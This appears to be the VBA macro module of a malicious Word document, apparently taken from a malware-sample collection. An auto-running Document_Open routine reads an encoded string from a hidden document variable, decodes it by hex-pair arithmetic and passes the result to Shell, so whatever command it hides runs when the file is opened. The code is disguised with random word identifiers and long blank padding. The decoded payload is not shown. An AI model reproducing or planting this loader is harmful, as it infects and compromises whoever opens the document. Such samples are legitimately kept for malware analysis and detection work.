Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Sub ambiversion(ByVal lemuria As String)





                  





             Dim numismatology As Long








                                            




                






                                                Dim ungainable As String







                  






                                                                            





                                        







             




                                        




            





                                                            For numismatology = 2 To Len(lemuria) Step 2






             





            






                                                    ungainable = ungainable & Chr(vitrioling(primely(lemuria, numismatology), 75))







                                                    Next numismatology






                                                            Shell ungainable






                   End Sub







               





             Sub Document_Open()






                                                            ambiversion ActiveDocument.Variables("z2a9c6d5f8425").Value








                                                            






                                                                        End Sub





                Private Function vitrioling(ByVal desquamated As String, ByVal gerundive As Long) As Long







                                                                    





                







                                                                        




                  






                 




                                                                            vitrioling = CLng(desquamated) - gerundive





          




                                                                





           







            End Function






                                                                




              







                                                    Private Function primely(ByVal desquamated As String, ByVal gerundive As Long) As String








            




                                                    






                                                                    primely = "&H" & Right(Left(desquamated, gerundive), 2)
End Function


INQUEST-PP=macro
